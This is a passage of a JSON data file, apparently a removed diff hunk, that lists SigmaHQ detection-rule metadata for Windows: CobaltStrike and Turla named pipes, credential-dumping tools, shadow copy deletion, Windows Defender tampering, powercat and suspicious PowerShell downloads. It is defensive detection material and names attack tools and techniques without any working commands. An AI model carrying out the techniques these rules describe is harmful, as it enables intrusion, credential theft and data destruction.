"car.2013-07-002" - ], - "creation_date": "2019/05/15", - "filename": "net_connection_win_susp_rdp.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "value": "Wuauclt Network Connection", - "meta": { - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/12", - "filename": "net_connection_win_wuauclt_network_connection.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate use of wuauclt.exe over the network." - ], - "logsource.category": "network_connection", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "value": "Alternate PowerShell Hosts Pipe", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects a named pipe used by Turla group samples", - "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", - "value": "Turla Group Named Pipes", - "meta": { - "refs": [ - "Internal Research", - "https://attack.mitre.org/groups/G0010/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" - ], - "creation_date": "2017/11/06", - "filename": "pipe_created_apt_turla_namedpipes.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "value": "Cred Dump-Tools Named Pipes", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ], - "creation_date": "2019/11/01", - "filename": "pipe_created_cred_dump_tools_named_pipes.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", - "value": "DiagTrackEoP Default Named Pipe", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/08/03", - "filename": "pipe_created_diagtrack_eop_default_pipe.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", - "value": "EfsPotato Named Pipe", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", - "https://github.com/zcgonvh/EfsPotato", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/08/23", - "filename": "pipe_created_efspotato_namedpipe.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of default named pipes used by the Koh tool", - "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "value": "Koh Default Named Pipes", - "meta": { - "refs": [ - "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" - ], - "creation_date": "2022/07/08", - "filename": "pipe_created_koh_default_pipe.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "value": "CobaltStrike Named Pipe", - "meta": { - "refs": [ - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", - "https://github.com/Neo23x0/sigma/issues/253", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/05/25", - "filename": "pipe_created_mal_cobaltstrike.yml", - "author": "Florian Roth, Wojciech Lesicki", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "value": "CobaltStrike Named Pipe Pattern Regex", - "meta": { - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/07/30", - "filename": "pipe_created_mal_cobaltstrike_re.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe used by known APT malware", - "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "value": "Malicious Named Pipe", - "meta": { - "refs": [ - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2017/11/06", - "filename": "pipe_created_mal_namedpipes.yml", - "author": "Florian Roth, blueteam0ps, elhoim", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects PAExec default named pipe", - "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "value": "PAExec Default Named Pipe", - "meta": { - "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/10/26", - "filename": "pipe_created_paexec_default_pipe.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "value": "PowerShell Execution Via Named Pipe", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "pipe_created_powershell_execution_pipe.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "value": "PsExec Default Named Pipe", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "pipe_created_psexec_default_pipe.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "value": "PsExec Tool Execution From Suspicious Locations - PipeName", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/08/04", - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate use of psexec from the locations mentioned above" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "value": "PsExec Pipes Artifacts", - "meta": { - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/05/10", - "filename": "pipe_created_psexec_pipes_artifacts.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate Administrator activity" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "value": "ADFS Database Named Pipe Connection", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://o365blog.com/post/adfs/", - "https://github.com/Azure/SimuLand", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2021/10/08", - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Processes in the filter condition" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "value": "CobaltStrike Named Pipe Patterns", - "meta": { - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/07/30", - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", - "author": "Florian Roth, Christian Burkard", - "level": "high", - "falsepositive": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "value": "WMI Event Consumer Created Named Pipe", - "meta": { - "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" - ], - "tags": [ - "attack.t1047", - "attack.execution" - ], - "creation_date": "2021/09/01", - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "pipe_created", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", - "value": "Alternate PowerShell Hosts", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/11", - "filename": "posh_pc_alternate_powershell_hosts.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "value": "Delete Volume Shadow Copies Via WMI With PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/06/03", - "filename": "posh_pc_delete_volume_shadow_copies.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "uuid": "6331d09b-4785-4c13-980f-f96661356249", - "value": "PowerShell Downgrade Attack - PowerShell", - "meta": { - "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/22", - "filename": "posh_pc_downgrade_attack.yml", - "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell called from an executable by the version mismatch method", - "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "value": "PowerShell Called from an Executable Version Mismatch", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pc_exe_calling_ps.yml", - "author": "Sean Metcalf (source), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", - "value": "Netcat The Powershell Version", - "meta": { - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], - "creation_date": "2021/07/21", - "filename": "posh_pc_powercat.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell sessions", - "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", - "value": "Remote PowerShell Session (PS Classic)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2019/08/10", - "filename": "posh_pc_remote_powershell_session.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Legitimate use remote PowerShell sessions" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed powershell", - "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", - "value": "Renamed Powershell Under Powershell Channel", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/06/29", - "filename": "posh_pc_renamed_powershell.yml", - "author": "Harish Segar, frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download command", - "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "value": "Suspicious PowerShell Download", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pc_susp_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", - "value": "Use Get-NetTCPConnection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2021/12/10", - "filename": "posh_pc_susp_get_nettcpconnection.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "posh_pc_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "value": "Tamper Windows Defender - PSClassic", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/06/07", - "filename": "posh_pc_tamper_with_windows_defender.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_provider_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "value": "Suspicious Non PowerShell WSMAN COM Provider", - "meta": { - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2020/06/24", - "filename": "posh_pc_wsman_com_provider_no_powershell.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/06/29", - "filename": "posh_pc_xor_commandline.yml", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_classic_start", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", - "value": "Alternate PowerShell Hosts - PowerShell Module", - "meta": { - "refs": [ - "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/08/11", - "filename": "posh_pm_alternate_powershell_hosts.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "value": "Bad Opsec Powershell Code Artifacts", - "meta": { - "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", - "https://www.mdeditor.tw/pl/pgRt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "posh_pm_bad_opsec_artifacts.yml", - "author": "ok @securonix invrep_de, oscd.community", - "level": "critical", - "falsepositive": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "value": "Clear PowerShell History - PowerShell Module", - "meta": { - "refs": [ - "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2019/10/25", - "filename": "posh_pm_clear_powershell_history.yml", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - 